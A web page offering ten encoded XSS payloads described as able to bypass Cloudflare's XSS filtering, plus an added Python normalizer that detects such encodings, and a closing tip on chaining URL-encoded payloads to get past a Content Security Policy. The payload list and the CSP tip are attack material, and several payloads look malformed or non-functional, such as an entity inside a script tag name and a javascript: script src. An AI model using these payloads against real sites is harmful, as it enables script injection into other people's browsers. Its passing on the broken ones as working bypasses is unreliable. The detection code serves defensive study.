Cloudflare's XSS protection

Cloudflare provides robust security measures to protect websites from various attacks, including Cross-Site Scripting (XSS). However, attackers may still find ways to bypass these protections. The payloads below all rely on encoding or obfuscation that a signature-based filter may fail to normalize before matching; they do not defeat correct output encoding or a strict Content Security Policy in the application itself, which remain the primary defence. Here are 10 examples of XSS payloads that could potentially bypass Cloudflare's XSS protection:

1. Unicode encoding:

```html
<scr&#x9Cipt>alert(1)</scr&#x9Cipt>
```

2. Using HTML entities:

```html
<img src=x onerror=&#x61lert&#x28&#x27123&#x27&#x29>
```

3. Using JavaScript URL encoding:

```html
<script src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x68&#x74&#x74&#x70&#x3A&#x2F&#x2F&#x77&#x77&#x77&#x2E&#x61&#x6C&#x65&#x72&#x74&#x2E&#x63&#x6F&#x6D&#x2F&#x73&#x63&#x72&#x69&#x70&#x74&#x27&#x29>
```

4. Using JavaScript encoding:

```html
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
```

5. Using CSS expressions:

```html
<style>@import'\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u0061\u006C\u0065\u0072\u0074\u002E\u0063\u006F\u006D\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u0027\u0029';</style>
```

6. Using JavaScript comments:

```html
<script>/*-/**/alert(1)/*-/*-->/*</script>
```

7. Using event handlers:

```html
<body onload=alert(1)>
```

8. Using JavaScript encoding with comments:

```html
<script>eval(String.fromCharCode(/*-*/97/*-*/,/*-*/108/*-*/,/*-*/101/*-*/,/*-*/114/*-*/,/*-*/116/*-*/,/*-*/40/*-*/,/*-*/49/*-*/,/*-*/41/*-*/))</script>
```

9. Using JavaScript encoding with whitespace:

```html
<script>eval(String.fromCharCode( 97, 108, 101, 114, 116, 40, 49, 41 ))</script>
```

10. Using JavaScript encoding with different encoding schemes:

```html
<script>eval(String.fromCharCode(0x61,0x6C,0x65,0x72,0x74,0x28,0x31,0x29))</script>
```

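Every payload in the list above reduces to the same few tokens once its encoding layers are peeled off, which is why a filter that matches the raw bytes misses them and a normalize-then-inspect step catches them. The following Python is an added example for detection, not code from the page's author or from Cloudflare; the samples are constructed in the styles listed above and the indicator pattern is an illustrative assumption, not any real WAF ruleset.

```python
import html
import re

# Constructed samples in the obfuscation styles listed above (not a claim
# about what any particular WAF does or does not block).
SAMPLES = {
    "entities": "<img src=x onerror=&#x61lert&#x28&#x31&#x29>",
    "decimal": "<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>",
    "hex": "<script>eval(String.fromCharCode(0x61,0x6C,0x65,0x72,0x74,0x28,0x31,0x29))</script>",
    "comments": "<script>eval(String.fromCharCode(/*-*/97/*-*/,/*-*/108/*-*/,/*-*/101/*-*/,/*-*/114/*-*/,/*-*/116/*-*/,/*-*/40/*-*/,/*-*/49/*-*/,/*-*/41/*-*/))</script>",
    "unicode": r"<style>@import'\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029';</style>",
    "benign": '<img src="logo.png" alt="alert icon">',
}

_COMMENT = re.compile(r"/\*.*?\*/", re.S)              # JS block comments
_JS_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")       # \uXXXX escapes
_FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*([^)]*)\)")


def _decode_char_codes(m: re.Match) -> str:
    # Evaluate String.fromCharCode(...) to the JS string literal it yields;
    # base 0 accepts decimal (97) and hex (0x61) tokens alike.
    codes = [int(t.strip(), 0) for t in m.group(1).split(",") if t.strip()]
    return "'" + "".join(map(chr, codes)) + "'"


def normalize(payload: str, max_rounds: int = 3) -> str:
    """Peel comment, entity, \\u and fromCharCode layers until stable."""
    s = payload
    for _ in range(max_rounds):
        prev = s
        s = _COMMENT.sub("", s)
        s = html.unescape(s)  # decodes &#x61 with or without a trailing ';'
        s = _JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), s)
        s = _FROM_CHAR_CODE.sub(_decode_char_codes, s)
        if s == prev:
            break
    return s


# Illustrative indicator pattern (assumption), applied only after normalization.
_INDICATORS = re.compile(r"<script\b|\bon[a-z]+\s*=|javascript:|\balert\s*\(|\beval\s*\(", re.I)


def indicators(payload: str) -> list[str]:
    """Distinct indicators found in the normalized payload, lowercased."""
    found = []
    for m in _INDICATORS.finditer(normalize(payload)):
        tok = re.sub(r"\s+", "", m.group(0).lower())
        if tok not in found:
            found.append(tok)
    return found


def is_suspicious(payload: str) -> bool:
    return bool(indicators(payload))
```

Running `indicators()` over `SAMPLES` shows the five obfuscated variants collapse to `alert(` plus a `<script`, `onerror=` or `javascript:` context, while the benign tag yields nothing.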
If a CSP policy blocked you while trying XSS, try two separate (encoded) XSS payloads one after another; this may help you bypass the filter.

1. `%3C/script%20%3E`
2. `mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E`
